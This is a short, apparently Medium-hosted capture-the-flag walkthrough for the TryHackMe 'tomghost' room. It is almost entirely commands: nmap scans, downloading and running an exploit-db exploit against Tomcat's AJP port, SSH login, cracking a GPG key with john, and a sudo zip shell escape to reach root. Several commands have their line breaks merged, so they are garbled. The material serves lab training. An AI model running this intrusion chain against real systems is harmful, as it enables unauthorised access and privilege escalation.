TryHackMe: tomghost

  1. Port scan
nmap -Pn <ip>
nmap -A -p 22,53,8009,8080 <ip>
nmap --script vuln <ip>
  1. Search for exploitation
searchsploit tomcat 9
searchsploit -m 41783
wget https://www.exploit-db.com/download/48143
python 48143 <target ip>
ssh skyfuck@<ip>
ls 
cat /etc/passwd
su merlin
cd /homelscd merlinlscat user.txt
  1. Verify sudo rights
sudo -l
crontab -e
gpg2john credential.pgp
gpg2john tryhackme.asc
gpg2john tryhackme.asc > hash
john --wordlist=rockyou.txt hashjohn hash --show
gpg --import tryhackme.asc gpg --decrypt credential.pgp
su merlin
sudo -l
TF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'
cd /rootlscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store